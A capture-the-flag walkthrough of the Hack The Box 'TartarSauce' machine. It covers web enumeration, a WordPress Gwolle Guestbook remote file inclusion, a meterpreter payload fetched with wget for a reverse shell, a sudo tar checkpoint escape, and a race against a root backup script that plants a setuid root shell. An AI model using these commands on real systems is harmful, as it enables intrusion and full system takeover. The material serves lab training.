TartarSauce Walkthrough - by ȜӎŗgͷͼȜ

This is a walk-through of the TartarSauce Challenge created for Hack The Box by ihack4falafel & ȜӎŗgͷͼȜ. This guide shows how it was intended that people may be able to complete this challenge.

Contents:


Scanning For Open Ports

To begin, we can use nmap to do a full port range scan for any open ports/services of tartarsauce.htb


[email protected]:~/TartarSauce# nmap -p- tartarsauce.htb --open

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-21 22:30 GMT
Nmap scan report for tartarsauce.htb (10.0.0.8)
Host is up (0.00011s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:C1:E0:AD (VMware)

Nmap done: 1 IP address (1 host up) scanned in 4.30 seconds

We have discovered 1 open port that looks like http.

So, now we can scan it in more detail.

Port 80 (http)


[email protected]:~/TartarSauce# nmap -p 80 tartarsauce.htb -A

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-22 18:32 GMT
Nmap scan report for tartarsauce.htb (10.0.0.8)
Host is up (0.00025s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries 
| /webservices/tar/tar/source/ 
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/ 
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page
MAC Address: 00:0C:29:C1:E0:AD (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.25 ms tartarsauce.htb (10.0.0.8)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.28 seconds

We note the interesting directory paths and save them to a list

So from here, people will likely manually visit the paths as shown in the robots.txt file. But, they are all rabbit holes, more enumeration is needed.

Web Directory Enumeration (http)

[email protected]:~/TartarSauce# curl -s http://tartarsauce.htb/robots.txt |grep Disallow |cut -d' ' -f2 > robots.dict && cat robots.dict 
/webservices/tar/tar/source/
/webservices/monstra-3.0.4/
/webservices/easy-file-uploader/
/webservices/developmental/
/webservices/phpmyadmin/
[email protected]:~/TartarSauce# dirsearch -u http://tartarsauce.htb -e htm,html,txt,php -w robots.dict 

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: htm, html, txt, php | Threads: 10 | Wordlist size: 5

Error Log: /opt/dirsearch/logs/errors-18-02-22_19-30-41.log

Target: http://tartarsauce.htb

[19:30:41] Starting: 
[19:30:41] 200 -    4KB - /webservices/monstra-3.0.4/

Task Completed


[email protected]:~/TartarSauce# nikto -h http://tartarsauce.htb/webservices/monstra-3.0.4/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.0.8
+ Target Hostname:    tartarsauce.htb
+ Target Port:        80
+ Start Time:         2018-02-22 19:32:29 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Cookie PHPSESSID created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /webservices/monstra-3.0.4/robots.txt, fields: 0x5c 0x52fc22eddc500 
+ Entry '/admin/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 4 entries which should be manually viewed.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /webservices/monstra-3.0.4/index.php?option=search&searchword=<script>alert(document.cookie);</script>: Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2820: /webservices/monstra-3.0.4/index.php?dir=<script>alert('Vulnerable')</script>: Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.
+ OSVDB-50552: /webservices/monstra-3.0.4/index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>: Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /webservices/monstra-3.0.4/index.php?action=storenew&username=<script>alert('Vulnerable')</script>: SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
+ /webservices/monstra-3.0.4/index.php/\"><script><script>alert(document.cookie)</script><: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-50553: /webservices/monstra-3.0.4/index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-50553: /webservices/monstra-3.0.4/index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-38019: /webservices/monstra-3.0.4/?mod=<script>alert(document.cookie)</script>&op=browse: Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3092: /webservices/monstra-3.0.4/sitemap.xml: This gives a nice listing of the site content.
+ OSVDB-25497: /webservices/monstra-3.0.4/index.php?rep=<script>alert(document.cookie)</script>: GPhotos index.php rep Variable XSS.
+ OSVDB-12606: /webservices/monstra-3.0.4/index.php?err=3&email=\"><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-2790: /webservices/monstra-3.0.4/index.php?vo=\"><script>alert(document.cookie);</script>: Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3092: /webservices/monstra-3.0.4/admin/: This might be interesting...
+ OSVDB-3093: /webservices/monstra-3.0.4/admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ 7452 requests: 0 error(s) and 23 item(s) reported on remote host
+ End Time:           2018-02-22 19:32:45 (GMT0) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


Monstra is a dead end troll…

More enumeration is required.


[email protected]:~/TartarSauce# dirsearch -u http://tartarsauce.htb/webservices/ -e htm,html,txt,php -w /usr/share/seclists/Discovery/Web_Content/big.txt 

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: htm, html, txt, php | Threads: 10 | Wordlist size: 20469

Error Log: /opt/dirsearch/logs/errors-18-02-22_19-36-52.log

Target: http://tartarsauce.htb/webservices/

[19:36:52] Starting: 
[19:37:41] 301 -  327B  - /webservices/wp  ->  http://tartarsauce.htb/webservices/wp/

Task Completed

[email protected]:~/TartarSauce# nikto -h http://tartarsauce.htb/webservices/wp/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.0.8
+ Target Hostname:    tartarsauce.htb
+ Target Port:        80
+ Start Time:         2018-02-22 21:58:27 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ RFC-1918 IP address found in the 'link' header. The IP is "192.168.80.135".
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://192.168.80.135/webservices/wp/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Server leaks inodes via ETags, header found with file /webservices/wp/wp-content/plugins/akismet/readme.txt, fields: 0x44cb 0x565bd87c9b9d6 
+ /webservices/wp/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /webservices/wp/wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /webservices/wp/license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /webservices/wp/wp-login.php: Wordpress login found
+ 7446 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2018-02-22 21:59:02 (GMT0) (35 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


So now we know we have a WordPress blog.

Wordpress Enumeration (http)

But when Visiting the site it fails to load. Looking at the response source code we are able to see its because the stylesheet resources are being requested from a hard-coded IP address that is no longer valid.

We can easily get round that by using burp replace.

Now we can view and navigate the site in a browser and see what we have.

And we are able to confirm its a WordPress blog and now scan it with wpscan.


[email protected]:~/TartarSauce# wpscan -u http://tartarsauce.htb/webservices/wp/ -e ap
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.3
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://tartarsauce.htb/webservices/wp/
[+] Started: Thu Feb 22 22:31:10 2018

[!] The WordPress 'http://tartarsauce.htb/webservices/wp/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://192.168.80.135/webservices/wp/index.php/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://tartarsauce.htb/webservices/wp/xmlrpc.php

[+] WordPress version 4.9.4 (Released on 2018-02-06) identified from meta generator, links opml
[!] 1 vulnerability identified from the version number

[!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
    Reference: https://wpvulndb.com/vulnerabilities/9021
    Reference: https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
    Reference: https://github.com/quitten/doser.py
    Reference: https://thehackernews.com/2018/02/wordpress-dos-exploit.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389

[+] WordPress theme in use: voce - v1.1.0

[+] Name: voce - v1.1.0
 |  Latest version: 1.1.0 (up to date)
 |  Last updated: 2017-09-01T00:00:00.000Z
 |  Location: http://tartarsauce.htb/webservices/wp/wp-content/themes/voce/
 |  Readme: http://tartarsauce.htb/webservices/wp/wp-content/themes/voce/readme.txt
 |  Style URL: http://tartarsauce.htb/webservices/wp/wp-content/themes/voce/style.css
 |  Referenced style.css: http://192.168.80.135/webservices/wp/wp-content/themes/voce/style.css
 |  Theme Name: voce
 |  Theme URI: http://limbenjamin.com/pages/voce-wp.html
 |  Description: voce is a minimal theme, suitable for text heavy articles. The front page features a list of rece...
 |  Author: Benjamin Lim
 |  Author URI: https://limbenjamin.com

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating all plugins (may take a while and use a lot of system resources) ...

   Time: 00:01:21 <========================================> (72873 / 72873) 100.00% Time: 00:01:21

[+] We found 3 plugins:

[+] Name: akismet - v4.0.3
 |  Latest version: 4.0.3 (up to date)
 |  Last updated: 2018-02-19T15:25:00.000Z
 |  Location: http://tartarsauce.htb/webservices/wp/wp-content/plugins/akismet/
 |  Readme: http://tartarsauce.htb/webservices/wp/wp-content/plugins/akismet/readme.txt

[+] Name: brute-force-login-protection - v1.5.3
 |  Latest version: 1.5.3 (up to date)
 |  Last updated: 2017-06-29T10:39:00.000Z
 |  Location: http://tartarsauce.htb/webservices/wp/wp-content/plugins/brute-force-login-protection/
 |  Readme: http://tartarsauce.htb/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt

[+] Name: gwolle-gb - v2.3.10
 |  Latest version: 2.3.10 (up to date)
 |  Last updated: 2018-02-10T13:14:00.000Z
 |  Location: http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/
 |  Readme: http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt

[+] Finished: Thu Feb 22 22:32:39 2018
[+] Requests Done: 73235
[+] Memory used: 215.133 MB
[+] Elapsed time: 00:01:28

Interestingly all the plugins seem to be up-to-date. However, If we go through and look for some exploits and manually try to check each one is really patched we may get lucky.

And, when we get to gwolle-gb we find the following POC example in exploit-db.


[email protected]:~/TartarSauce# searchsploit gwolle
---------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                  |  Path
                                                                | (/usr/share/exploitdb/)
---------------------------------------------------------------- ----------------------------------------
WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion | exploits/php/webapps/38861.txt
---------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
[email protected]:~/TartarSauce# searchsploit -p 38861
  Exploit: WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion
      URL: https://www.exploit-db.com/exploits/38861/
     Path: /usr/share/exploitdb/exploits/php/webapps/38861.txt
File Type: UTF-8 Unicode text, with very long lines, with CRLF line terminators

Copied EDB-ID #38861's path to the clipboard.


[email protected]:~/TartarSauce# grep /gwolle-gb/ /usr/share/exploitdb/exploits/php/webapps/38861.txt
http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]
https://wordpress.org/plugins/gwolle-gb/changelog/
[2] Gwolle Guestbook WordPress Plugin - https://wordpress.org/plugins/gwolle-gb/ - Gwolle Guestbook is the WordPress guestbook you've just been looking for.
[email protected]:~/TartarSauce#

Testing For The Remote File Include

Using a quick python 1-liner we can see if the RFI still works even though the version appears to be up-to-date.


[email protected]:~/TartarSauce# python -m SimpleHTTPServer 80  & sleep 2 && curl http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.0.0.4/
[2] 10194
Serving HTTP on 0.0.0.0 port 80 ...
[1]   Terminated              python -m SimpleHTTPServer 80
10.0.0.8 - - [22/Feb/2018 23:21:43] "GET /wp-load.php HTTP/1.0" 200 -

It worked! So, now we can try to get code execution using some php in a file called wp-load.php. Lets knock together a quick bash script to execute any commands we want.


[email protected]:~/TartarSauce# ./gwolle-pwn.sh 'id;uname -a;cat /etc/os-*'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 i686 i686 GNU/Linux
NAME="Ubuntu"
VERSION="16.04.3 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.3 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial


Great, it worked. So now to get a reverse shell.

Getting A Shell

Lets, start a meterpreter listener.


msf exploit(multi/handler) > jobs 

Jobs
====

  Id  Name                    Payload                            Payload opts
  --  ----                    -------                            ------------
  0   Exploit: multi/handler  linux/x86/meterpreter/reverse_tcp  tcp://10.0.0.4:1337

Then use msfvenom to create a quick payload and the gwolle-pwn.sh script to upload and execute it.


[email protected]:~/TartarSauce# msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=10.0.0.4 LPORT=1337 -o rev
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 957052 bytes
Saved as: rev
[email protected]:~/TartarSauce# ./gwolle-pwn.sh "wget http://10.0.0.4/rev && chmod +x rev && ./rev"

Then we get our reverse shell.


msf exploit(multi/handler) > 
[*] Sending stage (857352 bytes) to 10.0.0.8
[*] Meterpreter session 1 opened (10.0.0.4:1337 -> 10.0.0.8:42218) at 2018-03-07 17:50:57 +0000

msf exploit(multi/handler) > sessions -i 1 
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=33, gid=33, euid=33, egid=33
meterpreter > 

Enumeration

Following the usual enumeration steps, we find an inaccessible user home directory, and an interesting entry in www-data’s sudo privs.


meterpreter > shell
Process 29015 created.
Channel 1 created.
python -c "import pty;pty.spawn('/bin/bash')"
</wp/wp-content/plugins/gwolle-gb/frontend/captcha$ cd /
cd /
[email protected]:/$ ls -al home
ls -al home
total 12
drwxr-xr-x  3 root  root  4096 Feb  9 08:59 .
drwxr-xr-x 22 root  root  4096 Feb 15 17:21 ..
drwxrw----  5 onuma onuma 4096 Feb 21 13:04 onuma
[email protected]:/$ sudo -l 
sudo -l
Matching Defaults entries for www-data on TartarSauce:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on TartarSauce:
    (onuma) NOPASSWD: /bin/tar
[email protected]:/$

Gaining a shell as the user

After a bit of research we discover tar has the ability to execute a command in the context of the current user with a checkpoint-action option. So, we can do that with sudo to execute a command of our choosing as onuma and grab the user.txt hash.


[email protected]:/$ sudo -u onuma /bin/tar cf /dev/null /pwnd --checkpoint=1 --checkpoint-action=exec=/bin/bash
<v/null /pwnd --checkpoint=1 --checkpoint-action=exec=/bin/bash              
/bin/tar: Removing leading `/' from member names
/bin/tar: /pwnd: Cannot stat: No such file or directory
[email protected]:/$ id
id
uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)
[email protected]:~$ cd /home/onuma
cd /home/onuma
[email protected]:/home/onuma$ ls -al 
ls -al 
total 40
drwxrw---- 5 onuma onuma 4096 Feb 21 13:04 .
drwxr-xr-x 3 root  root  4096 Feb  9 08:59 ..
lrwxrwxrwx 1 root  root     9 Feb 17 05:19 .bash_history -> /dev/null
-rwxrw---- 1 onuma onuma  220 Feb  9 08:59 .bash_logout
-rwxrw---- 1 onuma onuma 3871 Feb 15 17:23 .bashrc
drwxrw---- 2 onuma onuma 4096 Feb  9 09:00 .cache
-rwxrw---- 1 onuma onuma   52 Feb 17 14:22 .mysql_history
drwxrw---- 2 onuma onuma 4096 Feb 17 11:39 .nano
-rwxrw---- 1 onuma onuma  655 Feb  9 08:59 .profile
drwxrw---- 2 onuma onuma 4096 Feb 15 14:35 .ssh
-rwxrw---- 1 onuma onuma    0 Feb  9 09:01 .sudo_as_admin_successful
lrwxrwxrwx 1 root  root     9 Feb 17 12:16 shadow_bkp -> /dev/null
-rwxrw---- 1 onuma onuma   33 Feb  9 09:54 user.txt
[email protected]:/home/onuma$ cat user.txt
cat user.txt
b2d...
[email protected]:/home/onuma$

After some more enumeration, we now find an interesting reference to a custom executable owned by root.


[email protected]:/home/onuma$ cat .mysql_history
cat .mysql_history
_HiStOrY_V2_
create\040database\040backuperer;
exit
[email protected]:/home/onuma$ ls -al /usr/local/bin/
ls -al /usr/local/bin/
total 8
drwxr-xr-x  2 root root 4096 Feb 17 14:25 .
drwxr-xr-x 10 root root 4096 Feb  9 08:55 ..
lrwxrwxrwx  1 root root   20 Feb 17 14:25 backup -> /usr/sbin/backuperer
[email protected]:/home/onuma$ ls -al /usr/sbin/backuperer
ls -al /usr/sbin/backuperer
-rwxr-xr-x 1 root root 1701 Feb 21 16:54 /usr/sbin/backuperer

Analysis of Backup App

If we look at it in more detail, we see its a custom website backup script.


[email protected]:/home/onuma$ cat /usr/sbin/backuperer
cat /usr/sbin/backuperer
#!/bin/bash

#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------

# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

# formatting
printbdr()
{
    for n in $(seq 72);
    do /usr/bin/printf $"-";
    done
}
bdr=$(printbdr)

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi
[email protected]:/home/onuma$

OK, so in the script source it says it’s an auto backup tool. So how is it auto-backing-up?

After a bit more enum we find the answer. As well as some interesting log files


[email protected]:/home/onuma$ find / -name *backuperer* 2>/dev/null
find / -name *backuperer* 2>/dev/null
/etc/systemd/system/multi-user.target.wants/backuperer.timer
/sys/kernel/slab/ext4_inode_cache/cgroup/ext4_inode_cache(1158:backuperer.service)
/sys/kernel/slab/ext4_inode_cache/cgroup/ext4_inode_cache(3188:backuperer.service)
/sys/kernel/slab/:aA-0000128/cgroup/dentry(3188:backuperer.service)
/sys/kernel/slab/:aA-0000128/cgroup/dentry(1544:backuperer.service)
/sys/kernel/slab/:aA-0000128/cgroup/dentry(1616:backuperer.service)
/sys/kernel/slab/:aA-0000128/cgroup/dentry(3512:backuperer.service)
/sys/kernel/slab/:aA-0000128/cgroup/dentry(1158:backuperer.service)
/sys/kernel/slab/:0000064/cgroup/kmalloc-64(3188:backuperer.service)
/sys/kernel/slab/:0000064/cgroup/kmalloc-64(1158:backuperer.service)
/sys/kernel/slab/radix_tree_node/cgroup/radix_tree_node(1158:backuperer.service)
/sys/kernel/slab/radix_tree_node/cgroup/radix_tree_node(3188:backuperer.service)
/sys/kernel/slab/radix_tree_node/cgroup/radix_tree_node(1544:backuperer.service)
/sys/kernel/slab/radix_tree_node/cgroup/radix_tree_node(1616:backuperer.service)
/sys/kernel/slab/radix_tree_node/cgroup/radix_tree_node(3512:backuperer.service)
/lib/systemd/system/backuperer.service
/lib/systemd/system/backuperer.timer
/usr/sbin/backuperer
[email protected]:/home/onuma$ cat /lib/systemd/system/backuperer.timer
cat /lib/systemd/system/backuperer.timer
[Unit]
Description=Runs backuperer every 5 mins

[Timer]
# Time to wait after booting before we run first time
OnBootSec=5min
# Time between running each consecutive time
OnUnitActiveSec=5min
Unit=backuperer.service

[Install]
WantedBy=multi-user.target
[email protected]:/home/onuma$ cat /lib/systemd/system/backuperer.service
cat /lib/systemd/system/backuperer.service
[Unit]
Description=Backuperer

[Service]
ExecStart=/usr/sbin/backuperer

[email protected]:/home/onuma$ ls -al /var/backups |grep onuma
ls -al /var/backups |grep onuma
-rw-r--r--  1 onuma onuma  11881082 Mar  8 13:57 onuma-www-dev.bak
-rw-r--r--  1 root  root       2733 Mar  8 13:28 onuma_backup_error.txt
-rw-r--r--  1 root  root        219 Mar  8 13:57 onuma_backup_test.txt

[email protected]:/home/onuma$ cat /var/backups/onuma_backup_error.txt
cat /var/backups/onuma_backup_error.txt
------------------------------------------------------------------------
Integrity Check Error in backup last ran :  Sat Feb 17 12:46:04 EST 2018
------------------------------------------------------------------------
/var/tmp/.5ab88ff0386cb85760f49c5d8a1dc73ac80dc46c
Only in /var/www/html: index.html
Only in /var/tmp/check/var/www/html: ȜӎŗgͷͼȜ_5h377
Only in /var/www/html: webservices
[email protected]:/home/onuma$

Ok, backup tool is running as a service on a 5 minute timer under systemd.

Breaking down the source of the backuperer script to understand how it works will help us identify if there are any vulnerabilities in the logic of how it functions.

This means that if we are quick and replace the temporary archive file in /var/tmp/[random sha1] within the 30 second window, we can cause root to extract any archive we put in it’s place.

We must also match the directory structure of var/www/html/ otherwise diff will not report the file mismatch, and cause the integrity_check function to fail like we need it to.

Also, note that the /bin/tar -zxvf $tmpfile -C $check command will preserve the file attributes contained in the archive.

So, we can use a watch command loop to wait for the /var/tmp/[random sha1] file to appear. Then overwrite it with an archive that has a matching directory structure but, also containing a suid root binary shell executable instead of the source code of the website.

This will force the ‘integrity_check’ to fail, and the suid file we uploaded in the archive will have been extracted by root and stay there for another 4 and a half minutes until the backup utility runs again.

This gives us a 4 minute 30 seconds window where we have the ability to run the file and pop a root shell.

At this point, everyone should get the hint in the name now. use tar, use tar again , review the source code :D

Privesc to Root

so lets see how we now put it all together…

Seeing as the target system is 32bit Ubuntu, lets start by creating a suid binary for a 32bit arch in the right dir structure, and use tar to create an archive.


[email protected]:~/TartarSauce# cat privesc.c 
int main(void) {
 setuid(0);
 clearenv();
 system("/usr/bin/python -c 'import pty; pty.spawn(\"/bin/bash\")'");
}
[email protected]:~/TartarSauce# mkdir -p var/www/html
[email protected]:~/TartarSauce# gcc -m32 privesc.c -o var/www/html/pwnd 2>/dev/null
[email protected]:~/TartarSauce# chmod 6005 var/www/html/pwnd
[email protected]:~/TartarSauce# ls -al  var/www/html/pwnd
---S--Sr-x 1 root root 7332 Mar  8 18:15 var/www/html/pwnd
[email protected]:~/TartarSauce# tar -zcvf pwnd.tar.gz var/www/html
var/www/html/
var/www/html/pwnd
[email protected]:~/TartarSauce# ls -al  pwnd.tar.gz 
-rw-r--r-- 1 root root 2677 Mar  8 18:26 pwnd.tar.gz

Now we just need to wait for the moment when the /var/tmp/[random sha1] file appears, then overwrite it.

So, lets use netcat to serve the pwnd.tar.gz file we just created.


[email protected]:~/TartarSauce# nc -nvlp 666 < pwnd.tar.gz 
listening on [any] 666 ...


In another terminal we can create another session and watch for the backup script to run.


[email protected]:/var/tmp$ watch -n 0.3 'ls -al |grep -v private'

total 40
drwxrwxrwt  9 root  root  4096 Mar  7 19:50 .
drwxr-xr-x 14 root  root  4096 Feb  9 08:59 ..
-rw-r--r--  1 onuma onuma 2625 Mar  7 19:50 .d12c93aba812092239d525c7861935c2baf46da5

Quickly, we pull the replacement file via nc and overwrite the contents of .d12c93aba812092239d525c7861935c2baf46da5


[email protected]:/var/tmp$ nc 10.0.0.4 666 > .d12c93aba812092239d525c7861935c2baf46da5
af46da5.0.4 666 > .d12c93aba812092239d525c7861935c2b 

Then wait for the script to extract it with root privs, and execute the suid pwnd binary.


[email protected]:/var/tmp$ ls -al 
ls -al 
total 40
drwxrwxrwt  9 root  root  4096 Mar  8 13:28 .
drwxr-xr-x 14 root  root  4096 Feb  9 08:59 ..
-rw-r--r--  1 onuma onuma 2677 Mar  8 13:28 .d12c93aba812092239d525c7861935c2baf46da5
drwxr-xr-x  3 root  root  4096 Mar  8 13:28 check

[email protected]:/var/tmp$ check/var/www/html/pwnd
check/var/www/html/pwnd
[email protected]:/var/tmp# id
id
uid=0(root) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)
[email protected]:/var/tmp# 

So now we have root and can read root.txt to prove it.


[email protected]:/var/tmp# cd /root
cd /root
[email protected]:/root# ls -al  
ls -al  
total 820
drwx------  4 root root    4096 Feb 21 16:50 .
drwxr-xr-x 22 root root    4096 Feb 15 17:21 ..
-rw-------  1 root onuma   3024 Mar  6 15:50 .bash_history
drwx------  2 root root    4096 Feb 17 17:23 .cache
-rw-------  1 root root     118 Feb 21 16:50 .mysql_history
drwxr-xr-x  2 root root    4096 Feb 21 13:06 .nano
-rw-r--r--  1 root root     170 Feb 21 08:15 .wget-hsts
-rw-------  1 root root      33 Feb  9 09:56 root.txt
-rw-r--r--  1 root root  282407 Feb 21 16:48 sys.sql
-rw-r--r--  1 root root  522163 Feb 21 16:48 wp.sql
[email protected]:/root# cat root.txt
cat root.txt
e79a...
[email protected]:/root# 

The End…